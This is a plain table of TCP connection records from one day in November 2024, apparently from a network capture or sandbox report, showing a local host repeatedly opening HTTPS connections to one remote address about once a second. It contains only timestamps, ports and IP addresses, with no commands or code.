Nov 29, 2024 12:28:42.963748932 CET	49863	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:42.963958025 CET	49863	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:42.963969946 CET	443	49863	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:43.364438057 CET	443	49862	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:43.364536047 CET	49862	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:43.365093946 CET	49862	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:43.365107059 CET	443	49862	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:43.384288073 CET	49862	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:43.384310007 CET	443	49862	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:43.384330988 CET	49862	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:43.384340048 CET	443	49862	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:44.987855911 CET	443	49862	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:44.987938881 CET	443	49862	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:44.988029003 CET	49862	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:44.988063097 CET	49862	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:44.989270926 CET	49862	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:44.989295959 CET	443	49862	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:45.203643084 CET	443	49863	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:45.203881025 CET	49863	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:45.204463005 CET	49863	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:45.204468966 CET	443	49863	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:45.227973938 CET	49863	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:45.227986097 CET	443	49863	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:45.228037119 CET	49863	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:45.228043079 CET	443	49863	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:45.989478111 CET	49864	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:45.989537001 CET	443	49864	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:45.989655972 CET	49864	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:45.990053892 CET	49864	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:45.990072012 CET	443	49864	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:46.321175098 CET	443	49863	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:46.321261883 CET	443	49863	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:46.321269989 CET	49863	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:46.321319103 CET	49863	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:46.322293043 CET	49863	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:46.322309017 CET	443	49863	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:46.995270014 CET	49865	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:46.995318890 CET	443	49865	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:46.995394945 CET	49865	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:46.995681047 CET	49865	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:46.995692968 CET	443	49865	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:47.466723919 CET	443	49864	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:47.466962099 CET	49864	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:47.467519999 CET	49864	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:47.467535019 CET	443	49864	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:47.487492085 CET	49864	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:47.487517118 CET	443	49864	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:47.487545013 CET	49864	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:47.487555027 CET	443	49864	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:48.514461040 CET	443	49865	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:48.514580965 CET	49865	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:48.514997959 CET	49865	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:48.515010118 CET	443	49865	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:48.537497997 CET	49865	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:48.537516117 CET	443	49865	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:48.537554979 CET	49865	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:48.537563086 CET	443	49865	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:48.585856915 CET	443	49864	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:48.585918903 CET	49864	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:48.585933924 CET	443	49864	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:48.585978031 CET	49864	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:48.586806059 CET	49864	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:48.586823940 CET	443	49864	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:49.020234108 CET	49866	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:49.020272017 CET	443	49866	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:49.020345926 CET	49866	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:49.020570993 CET	49866	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:49.020585060 CET	443	49866	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:49.657902002 CET	443	49865	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:49.657987118 CET	443	49865	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:49.658004999 CET	49865	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:49.658034086 CET	49865	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:49.659159899 CET	49865	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:49.659183025 CET	443	49865	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:50.040966034 CET	49867	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:50.041007996 CET	443	49867	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:50.041089058 CET	49867	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:50.041343927 CET	49867	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:50.041364908 CET	443	49867	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:50.440876007 CET	443	49866	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:50.440960884 CET	49866	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:50.441348076 CET	49866	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:50.441354036 CET	443	49866	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:50.463692904 CET	49866	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:50.463711023 CET	443	49866	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:50.463737011 CET	49866	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:50.463743925 CET	443	49866	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:51.554841042 CET	443	49866	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:51.554933071 CET	443	49866	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:51.554984093 CET	49866	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:51.555013895 CET	49866	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:51.556104898 CET	49866	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:51.556122065 CET	443	49866	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:51.563188076 CET	443	49867	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:51.563287020 CET	49867	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:51.563620090 CET	49867	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:51.563630104 CET	443	49867	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:51.594655991 CET	49867	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:51.594683886 CET	443	49867	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:51.594707966 CET	49867	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:51.594717026 CET	443	49867	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:52.067601919 CET	49868	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:52.067656040 CET	443	49868	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:52.067742109 CET	49868	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:52.068001986 CET	49868	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:52.068026066 CET	443	49868	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:52.697937965 CET	443	49867	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:52.698015928 CET	443	49867	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:52.698112011 CET	49867	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:52.698177099 CET	49867	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:52.699609995 CET	49867	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:52.699634075 CET	443	49867	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:53.079425097 CET	49869	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:53.079472065 CET	443	49869	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:53.079533100 CET	49869	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:53.080724955 CET	49869	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:53.080744028 CET	443	49869	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:53.488646030 CET	443	49868	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:53.488720894 CET	49868	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:53.489397049 CET	49868	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:53.489403009 CET	443	49868	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:53.515459061 CET	49868	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:53.515467882 CET	443	49868	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:53.515482903 CET	49868	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:53.515496016 CET	443	49868	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:54.553718090 CET	443	49869	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:54.553976059 CET	49869	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:54.554570913 CET	49869	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:54.554583073 CET	443	49869	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:54.575839996 CET	49869	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:54.575850010 CET	443	49869	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:54.575917006 CET	49869	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:54.575922966 CET	443	49869	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:54.613563061 CET	443	49868	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:54.613639116 CET	443	49868	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:54.613744974 CET	49868	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:54.613800049 CET	49868	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:54.615063906 CET	49868	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:54.615082979 CET	443	49868	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:55.099339962 CET	49871	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:55.099385023 CET	443	49871	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:55.099497080 CET	49871	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:55.099889994 CET	49871	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:55.099901915 CET	443	49871	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:55.673922062 CET	443	49869	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:55.673991919 CET	443	49869	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:55.674118996 CET	49869	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:55.675017118 CET	49869	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:55.675277948 CET	49869	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:55.675297976 CET	443	49869	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:56.038021088 CET	49823	443	192.168.2.8	204.79.197.219
Nov 29, 2024 12:28:56.038044930 CET	443	49823	204.79.197.219	192.168.2.8
Nov 29, 2024 12:28:56.040594101 CET	49824	443	192.168.2.8	204.79.197.219
Nov 29, 2024 12:28:56.040616035 CET	443	49824	204.79.197.219	192.168.2.8
Nov 29, 2024 12:28:56.107450962 CET	49872	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:56.107492924 CET	443	49872	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:56.107559919 CET	49872	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:56.107783079 CET	49872	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:56.107794046 CET	443	49872	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:56.349033117 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:56.469512939 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:56.469607115 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:56.614895105 CET	443	49871	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:56.615014076 CET	49871	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:56.615576029 CET	49871	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:56.615592003 CET	443	49871	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:56.636574030 CET	49871	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:56.636588097 CET	443	49871	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:56.636607885 CET	49871	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:56.636615992 CET	443	49871	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:57.574685097 CET	443	49872	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:57.574770927 CET	49872	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:57.575372934 CET	49872	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:57.575388908 CET	443	49872	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:57.593482018 CET	49872	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:57.593504906 CET	443	49872	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:57.593523026 CET	49872	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:57.593530893 CET	443	49872	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:57.743355989 CET	443	49871	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:57.743432999 CET	443	49871	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:57.743458986 CET	49871	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:57.743484020 CET	49871	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:57.744404078 CET	49871	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:57.744431973 CET	443	49871	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:58.129919052 CET	49873	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:58.129971981 CET	443	49873	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:58.130089998 CET	49873	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:58.130302906 CET	49873	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:58.130317926 CET	443	49873	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:58.285291910 CET	49800	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:58.285310030 CET	443	49800	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:58.285345078 CET	49801	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:58.285378933 CET	443	49801	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:58.285479069 CET	49821	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:58.285485983 CET	443	49821	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:58.285546064 CET	49822	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:58.285552025 CET	443	49822	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:58.622627020 CET	49874	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:58.622679949 CET	443	49874	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:58.622756958 CET	49874	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:58.622941017 CET	49874	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:58.622955084 CET	443	49874	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:58.702778101 CET	443	49872	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:58.702847958 CET	443	49872	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:58.702887058 CET	49872	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:58.702922106 CET	49872	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:58.703815937 CET	49872	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:58.703831911 CET	443	49872	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:59.134977102 CET	49875	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:59.135036945 CET	443	49875	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:59.135107040 CET	49875	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:59.135351896 CET	49875	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:59.135366917 CET	443	49875	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:59.634042025 CET	443	49873	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:59.634151936 CET	49873	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:59.634609938 CET	49873	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:59.634624004 CET	443	49873	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:59.653069973 CET	49873	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:59.653084993 CET	443	49873	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:59.653136015 CET	49873	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:59.653141022 CET	443	49873	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:59.880117893 CET	443	49874	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:59.880515099 CET	49874	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:59.880561113 CET	443	49874	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:59.881601095 CET	443	49874	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:59.881665945 CET	49874	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:59.881949902 CET	49874	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:59.882014036 CET	443	49874	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:59.927783966 CET	49874	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:59.927814960 CET	443	49874	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:59.986911058 CET	49874	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:29:00.729763985 CET	443	49875	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:00.729909897 CET	49875	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:00.730658054 CET	49875	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:00.730667114 CET	443	49875	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:00.751698017 CET	49875	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:00.751708984 CET	443	49875	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:00.751748085 CET	49875	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:00.751765013 CET	443	49875	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:00.759968042 CET	443	49873	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:00.760049105 CET	443	49873	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:00.760067940 CET	49873	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:00.760113001 CET	49873	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:00.761148930 CET	49873	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:00.761162043 CET	443	49873	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:01.161089897 CET	49876	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:01.161134958 CET	443	49876	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:01.161253929 CET	49876	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:01.161659002 CET	49876	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:01.161669016 CET	443	49876	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:01.822062016 CET	443	49875	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:01.822159052 CET	443	49875	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:01.822208881 CET	49875	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:01.822240114 CET	49875	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:01.823304892 CET	49875	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:01.823328972 CET	443	49875	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:02.165956974 CET	49877	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:02.165992975 CET	443	49877	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:02.166071892 CET	49877	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:02.166369915 CET	49877	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:02.166380882 CET	443	49877	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:02.582999945 CET	443	49876	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:02.585793018 CET	49876	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:02.586847067 CET	49876	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:02.586854935 CET	443	49876	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:02.622266054 CET	49876	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:02.622266054 CET	49876	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:02.622301102 CET	443	49876	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:02.622330904 CET	443	49876	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:03.680421114 CET	443	49877	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:03.680506945 CET	49877	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:03.681117058 CET	49877	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:03.681132078 CET	443	49877	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:03.692677021 CET	443	49876	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:03.692740917 CET	49876	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:03.692759991 CET	443	49876	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:03.692894936 CET	49876	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:03.694478035 CET	49876	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:03.694493055 CET	443	49876	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:03.708273888 CET	49877	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:03.708303928 CET	443	49877	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:03.708369970 CET	49877	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:03.708376884 CET	443	49877	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:04.176974058 CET	49878	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:04.177006960 CET	443	49878	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:04.177076101 CET	49878	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:04.177310944 CET	49878	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:04.177320004 CET	443	49878	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:04.810586929 CET	443	49877	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:04.810678005 CET	443	49877	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:04.810842991 CET	49877	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:04.810898066 CET	49877	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:04.812002897 CET	49877	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:04.812042952 CET	443	49877	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:05.197772980 CET	49881	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:05.197810888 CET	443	49881	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:05.197901964 CET	49881	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:05.198139906 CET	49881	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:05.198157072 CET	443	49881	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:05.690335035 CET	443	49878	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:05.690665007 CET	49878	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:05.691129923 CET	49878	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:05.691135883 CET	443	49878	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:05.720778942 CET	49878	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:05.720784903 CET	443	49878	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:05.720832109 CET	49878	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:05.720835924 CET	443	49878	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:06.664949894 CET	443	49881	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:06.665064096 CET	49881	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:06.665580988 CET	49881	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:06.665590048 CET	443	49881	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:06.685048103 CET	49881	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:06.685062885 CET	443	49881	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:06.685105085 CET	49881	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:06.685115099 CET	443	49881	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:06.795900106 CET	443	49878	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:06.795979977 CET	443	49878	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:06.796024084 CET	49878	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:06.796045065 CET	49878	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:06.797065973 CET	49878	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:06.797084093 CET	443	49878	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:07.223121881 CET	49882	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:07.223160028 CET	443	49882	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:07.223241091 CET	49882	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:07.223460913 CET	49882	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:07.223470926 CET	443	49882	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:07.773593903 CET	443	49881	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:07.773675919 CET	443	49881	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:07.773693085 CET	49881	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:07.773731947 CET	49881	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:07.774632931 CET	49881	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:07.774652958 CET	443	49881	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:08.230453968 CET	49883	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:08.230509996 CET	443	49883	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:08.230595112 CET	49883	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:08.230861902 CET	49883	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:08.230875015 CET	443	49883	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:08.690129995 CET	443	49882	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:08.690269947 CET	49882	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:08.691148996 CET	49882	443	192.168.2.8	95.217.25.228
